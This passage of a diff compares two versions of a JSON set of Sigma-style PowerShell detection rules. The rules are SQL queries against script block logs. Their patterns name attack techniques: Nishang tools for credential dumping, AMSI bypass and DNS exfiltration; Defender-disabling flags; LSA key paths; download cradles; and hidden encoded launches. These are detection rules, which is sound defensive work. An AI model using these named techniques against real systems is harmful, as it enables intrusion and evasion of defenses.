"tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Administrator script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND 
Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Set-ExecutionPolicy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Unrestricted%' ESCAPE '\\' OR ScriptBlockText LIKE '%bypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName \\_\\_EventFilter %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName CommandLineEventConsumer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\')))" ], - "filename": "posh_ps_set_policies_to_unsecure_level.yml" + "filename": "posh_ps_wmi_persistence.yml" }, { - "title": "PowerShell Write-EventLog Usage", - "id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", - "status": "experimental", - "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. 
The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Get-ADReplAccount", + "id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "status": "test", + "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003.006" ], "falsepositives": [ - "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Write-EventLog%' ESCAPE '\\' AND ScriptBlockText LIKE '%-RawData %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADReplAccount%' ESCAPE '\\' AND ScriptBlockText LIKE '%-All %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Server %' ESCAPE '\\')" ], - "filename": "posh_ps_susp_write_eventlog.yml" + "filename": "posh_ps_get_adreplaccount.yml" }, { - "title": "PowerShell Create Local User", - "id": "243de76f-4725-4f2e-8225-a8a69b15ad61", + "title": "Suspicious Unblock-File", + "id": "5947497f-1aa4-41dd-9693-c9848d58727d", "status": "test", - "description": "Detects creation of a local user via PowerShell", - "author": "@ROxPinTeddy", + "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "author": "frack113", "tags": [ - 
"attack.execution", - "attack.t1059.001", - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1553.005" ], "falsepositives": [ - "Legitimate user creation" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Unblock-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\')" ], - "filename": "posh_ps_create_local_user.yml" + "filename": "posh_ps_susp_unblock_file.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Start-Process PassThru", + "id": "0718cd72-f316-4aa2-988f-838ea8533277", + "status": "test", + "description": "Powershell use PassThru option to start in background", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-PassThru %' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath %' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" + "filename": "posh_ps_susp_start_process.yml" }, { - "title": "Suspicious PowerShell Get Current User", - "id": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "id": "22d80745-6f2c-46da-826b-77adaededd74", "status": "experimental", - "description": "Detects the use of PowerShell to identify the current logged user.", - "author": "frack113", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%[System.Environment]::UserName%' ESCAPE '\\' OR ScriptBlockText LIKE '%$env:UserName%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Security.Principal.WindowsIdentity]::GetCurrent()%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' 
ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_get_current_user.yml" + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" }, { - "title": "Powershell XML Execute Command", - "id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "title": "Potential Suspicious Windows Feature Enabled", + "id": "55c925c1-7195-426b-a136-a9396800e29b", "status": "experimental", - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate usage of the features listed in the rule." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Xml.XmlDocument%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Load%' ESCAPE '\\' AND (ScriptBlockText LIKE '%IEX %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Expression %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Command %' ESCAPE '\\' OR ScriptBlockText LIKE '%ICM -%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%TelnetServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TFTP%' ESCAPE '\\' OR ScriptBlockText LIKE '%SMB1Protocol%' ESCAPE '\\' OR ScriptBlockText LIKE '%Client-ProjFS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" ], - "filename": "posh_ps_xml_iex.yml" + "filename": "posh_ps_enable_susp_windows_optional_feature.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "title": "Potential Persistence Via Security Descriptors - ScriptBlock", + "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. 
As seen used in the DAMP project.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_var.yml" + "filename": "posh_ps_susp_ace_tampering.yml" }, { - "title": "Automated Collection Command PowerShell", - "id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", - "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "title": "Suspicious TCP Tunnel Via PowerShell Script", + "id": "bd33d2aa-497e-4651-9893-5c5364646595", + "status": "experimental", + "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119" + 
"attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.doc%' ESCAPE '\\' OR ScriptBlockText LIKE '%.docx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xls%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xlsx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.ppt%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pptx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.rtf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pdf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.txt%' ESCAPE '\\') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Include %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Net.HttpWebRequest]%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.Sockets.TcpListener%' ESCAPE '\\' AND ScriptBlockText LIKE '%AcceptTcpClient%' ESCAPE '\\')" ], - "filename": "posh_ps_automated_collection.yml" + "filename": "posh_ps_susp_proxy_scripts.yml" }, { - "title": "Tamper Windows Defender - ScriptBlockLogging", - "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "title": "Malicious Nishang PowerShell Commandlets", + "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", "status": "experimental", - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "author": "frack113, elhoim, Tim Shelton (fps, alias support)", + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "author": "Alec Costello", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate 
PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' 
ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" - ], - "filename": "posh_ps_tamper_defender.yml" - }, - { - "title": "Execute Invoke-command on Remote Host", - "id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", - "status": "test", - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", - "author": "frack113", - "tags": [ - "attack.lateral_movement", - "attack.t1021.006" - ], - "falsepositives": [ - "Legitimate script" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%invoke-command %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ComputerName %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_command_remote.yml" + "filename": "posh_ps_nishang_malicious_commandlets.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic", - "id": "ed965133-513f-41d9-a441-e38076a0798f", + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "status": "test", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of PSAttack PowerShell hack tool", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_invocation_generic.yml" + "filename": "posh_ps_psattack.yml" }, { - "title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", - "id": "1139d2e2-84b1-4226-b445-354492eba8ba", - "status": "experimental", - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", - "author": "James Pemberton / @4A616D6573", + "title": "Powershell Directory Enumeration", + "id": "162e69a7-7981-4344-84a9-0f1c9a217a52", + "status": "test", + "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
+ "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\' OR ScriptBlockText LIKE '%wget %' ESCAPE '\\' OR ScriptBlockText LIKE '%curl %' ESCAPE '\\' OR ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR ScriptBlockText LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\') AND NOT (Path LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%foreach%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ErrorAction %' ESCAPE '\\' AND ScriptBlockText LIKE '%SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '%Out-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-append%' ESCAPE '\\')" ], - "filename": "posh_ps_web_request_cmd_and_cmdlets.yml" + "filename": "posh_ps_susp_directory_enum.yml" }, { - "title": "Silence.EDA Detection", - "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "title": "Powershell File and Directory Discovery", + "id": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", "status": "test", - "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", - "author": "Alina Stepchenkova, Group-IB, oscd.community", + "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain 
information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND 